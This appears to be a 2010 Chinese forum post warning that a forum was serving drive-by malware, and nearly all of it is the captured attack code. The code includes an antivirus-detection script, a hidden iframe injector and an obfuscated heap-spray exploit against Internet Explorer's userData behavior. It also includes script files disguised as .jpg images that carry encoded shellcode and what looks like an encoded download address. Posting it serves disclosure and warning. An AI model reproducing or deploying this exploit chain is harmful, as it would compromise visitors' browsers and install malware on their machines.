|
疑似挂马,有图有真像:
本帖最后由 net2003 于 2010-5-25 20:57 编辑
以下是访问论坛时监测到的所有链接,
其中有两个html文件是嵌入的frame,
三个jpg文件是的类型实际上是脚本。
index1.html:
- <html>
- <script language="javascript">
- var now = new Date();
- var miao = now.getSeconds();
- document.write("<\/BR>");
- if (miao>25&&miao<80)
- {
- document.writeln("<script type="text\/javascript" src="http:\/\/js.tongji.linezing.com\/1676188\/tongji.js"><\/script><noscript><a href="http:\/\/www.linezing.com"><img src="http:\/\/img.tongji.linezing.com\/1676188\/tongji.gif"\/><\/a><\/noscript>");
- }
- </script>
- <script>
- function setCookie(name, value, expire) {
- window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
- }
- function getCookie(Name) {
- var search = Name + "=";
- if (window.document.cookie.length > 0) { // if there are any cookies
- offset = window.document.cookie.indexOf(search);
- if (offset != -1) { // if cookie exists
- offset += search.length;
- // set index of beginning of value
- end = window.document.cookie.indexOf(";", offset)
- // set index of end of cookie value
- if (end == -1)
- end = window.document.cookie.length;
- return unescape(window.document.cookie.substring(offset, end));
- }
- }
- return null;
- }
- function register(name) {
- var today = new Date();
- var expires = new Date();
- expires.setTime(today.getTime() + 1000);
- setCookie("ItDoor", name, expires);
- }
- function openWin() {
- var c = getCookie("ItDoor");
- if (c != null) {
- return;
- }
- register("xiaolin");
-
-
- if(document.cookie.indexOf('hello')==-1)
- {
- var expires=new Date();expires.setTime(expires.getTime()+1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();
- knownImg = {}
- knownImg.resList = [
- {id: 'safe', res: 'res://c:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
- {id: 'asafe', res: 'res://d:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
- {id: 'bsafe', res: 'res://c:\\Program%20Files\\360Safe\\live.dll/#2/#203'},
- {id: 'csafe', res: 'res://d:\\Program%20Files\\360Safe\\live.dll/#2/#203'}
- ];
- knownImg.ok_resList = new Array();
- knownImg.tmp_resList = new Array();
- knownImg.checkSoft = function(){
- if (document.all){
- x = new Array();
- for (i = 0; i < knownImg.resList.length; i++){
- x[i] = new Image();
- x[i].src = "";
- knownImg.ok_resList.push(knownImg.resList[i].id);
- x[i].onload = function(){
- //alert(knownImg.resList[i].id + ': return true');
- }
- x[i].onerror = function(){
- //alert(knownImg.resList[i].id + ': return false');
- knownImg.ok_resList.pop();
- }
- x[i].src = knownImg.resList[i].res;
- }
- }
- }
- knownImg.checkSoft();
- if(knownImg.ok_resList.length>0){
- //alert(knownImg.ok_resList);
- //document.write('你:<br />'+knownImg.ok_resList.join('<br />'));
- }else{
- //alert('没');
-
- var NewWords;
- NewWords = unescape("<iframe src=jk.html width=100 height=0></iframe>");
- document.write(NewWords);
-
- }
- }
-
- }
- openWin();
- </script>
- </html>
复制代码
jk.html,使用了代码迷惑:
- <SCRIPT LANGUAGE="JavaScript">
- <!-- Hide
- function killErrors() {
- return true;
- }
- window.onerror = killErrors;
- // -->
- </SCRIPT>
- <script src="pl.jpg"></script>
- <script src="y1.jpg"></script>
- <script src="tl.jpg"></script>
- <BUTTON
- id=PPSytytYYtTTyyutian
- style="DISPLAY: none"
- onclick=newTyPPSytytYYtTTyyutianAVpYyTt();></BUTTON>
- <SCRIPT
- language=javascript>
- function
- PPSytytYYtTTyyutianAVp(){
- YtYtTyPPSytytYYtTTyyutianAVpYyTt
- = new Array();
- var
- BIytKKTyPPSytytYYtTTyyutianAVpYyTt =
- 0x86000-(PPSytytYYtTTyyutianAVpYyTt.length*2);
- while(LFlwBa.length<BIytKKTyPPSytytYYtTTyyutianAVpYyTt/2)
- { LFlwBa+=LFlwBa; }
- var
- youxiYTYTyyttYtTYyTian
- =
- LFlwBa.substring(0,BIytKKTyPPSytytYYtTTyyutianAVpYyTt/2);
- delete
- LFlwBa;
- for(YTiancazaWaGa=0;
- YTiancazaWaGa<270; YTiancazaWaGa++)
-
- YtYtTyPPSytytYYtTTyyutianAVpYyTt[YTiancazaWaGa]
- =
- youxiYTYTyyttYtTYyTian
- +
- youxiYTYTyyttYtTYyTian
- +
- PPSytytYYtTTyyutianAVpYyTt;
- }
- function
- newTyPPSytytYYtTTyyutianAVpYyTt(){
- PPSytytYYtTTyyutianAVp();
- var
- yutYianYtAYtVP =
- document.createElement('b'+'o'+'dy');
- yutYianYtAYtVP.addBehavior('#default#userData');
- document.appendChild(yutYianYtAYtVP);
- try
- {
- for (YTiancazaWaGa=0;
- YTiancazaWaGa<10; YTiancazaWaGa++)
- yutYianYtAYtVP.setAttribute('s',window);
-
- } catch(e){ }
- window.status+='';
- }
- document.getElementById('PPSytytYYtTTyyutian').onclick();
- </SCRIPT>
复制代码
pl.jpg:
- try {
- new ActiveXObject("kaix");
- }
- catch (e) {
- var ytpps="%uyt9yt2yt9yt2";
- var UUse=(ytpps.replace(/yt/g,""));
- var YTavp="%"+"yutianu"+"ByutianD"+"ByutianD"+"%"+"uB"+"D"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%u"+"B"+"D"+"B"+"D"+"%u"+"BD"+"ByutianD"+"%u"+"ByutianD"+"BD"+"%u"+"BD"+"ByutianD"+"%u"+"BD"+"ByutianD"+"%u"+"EAEA";
- var YTavp88=(YTavp.replace(/yutian/g,""));
- var YTavp99="%u"+"54FF%uBEA3%uBDyutianBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1"+"%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%u"+"D5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uyutianBDBC%u36BD%uD7yutian55%uE4B8"+"%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u"+"7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355"+"%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%u"+"CED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4"+"%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%u"+"BDyutianD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44"+"%uBEB9%uE4E1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u"+"8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD"+"%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%u"+"BCBC%uBDBD%uFB34%uD7DD%uEDyutianBD%uEB42%u3495%uD9FB%uFB36%uD7DD"+"%uD7BD%uD7BD%uD7BD%uD7yutianB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%u"+"BDA2%uByutianDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909"+"%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u"+"7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7yutianBD%uD7BD%uD7BD"+"%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%u"+"CB42%uEDCD%uCB42%u42DD%u8DEB%uCByutian42%u42DD%u89EB%uCB42%u42C5"+"%uFDEB%u4636%u7D8E%u66yutian8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u"+"34Byutian5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED"+"%uEDEE%uEDyutianED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%"+"u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB"+"%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDyutianB9%uBDBD%u1D30%u42DD%u4242%"+"uD8D7%uCB42%u3681%uADyutianFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE"+"%u3D6D%u55yutian85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u"+"36E8%u3051%uB8FD%u5D42%u1Byutian55%uBDBD%u7EBD%u1D55%uBDyutianBD%u0yutian5BD"+"%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5yutian13C%uBCBD%uBDBD%u4136%"+"u7A3E%u7AB9%u8FBA%u2CyutianC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5"+"%u2AyutianD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%"+"uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A"+"%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD5yutian36%u"+"36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8yutianED5%uBD8F%uD5BD"+"%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%u"+"BDBD%u445F%u428E%u42yutianEA%uB9yutianEB%uBF56%u7EE5%u4455%u4242%uE642"+"%uBA7B%u3405%yutianuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61yutian36%uD7EE%uD5FD%u"+"ADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8"+"%uC93yutian6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%yutianuBE10%u8E78%u"+"B266%uAD03%u6Byutian87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8"+"%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36yutian60%u3yutian6B9%u78yutianBE%u"+"E316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5"+"%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%u"+"A376%uyutianD919%u2E5yutian2%u59yutian8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230"+"%uEAC9%uByutian0DB%uFE42%u1103%uC066%u18yutian4D%uEF27%u1A43%u8367%u0ByutianA0%u0584%u69yutianD4%u03A6%uyutianDBC2%u411D%u8A14%u25yutian10%uyutianAyutianDB7%yutianu3D45%u12yutian6B"+"%u46"+"27%u"+"A8"+"EE";
- var YTavp98=(YTavp99.replace(/yutian/g,""));
- var LFlwBa = unescape('%'+'u'+'0c0c'+'%'+'u'+'0c0c');
- }
复制代码
tl.jpg
- try {
- new ActiveXObject("kaix");
- }
- catch (e) {
- var PPSytytYYtTTyyutianAVpYyTt=unescape(UUse+YTavp1+YTavp98+YTMTV+YTavp88);
- }
复制代码
y1.jpg:
- try {
- new ActiveXObject("kaix");
- }
- catch (e) {
- var YTMTV="%ud5db%uc9c9%u87cd%u9292%ucfda%udbda%u8e89%ud889%u93cf%u8585%u8d8d%ud293%udacf%u8587%u8485%u9284%u9285%ud3d9%ud893%ud8c5%uBDBD%uBDBD";
- var YTavp123="%u58yutianayt58%u58yutianayt58%u10yutianaytEB%u4Byutianayt5B%uC9yutianayt33%uB9yutianayt66%u03yutianaytB8%u34yutianayt80%uBDyutianayt0B%uFAE2%u05yutianaytEB%uEByutianaytE8%uFFyutianaytFF";
- var YTavp1=(YTavp123.replace(/yutianayt/g,""));
- }
复制代码 |
|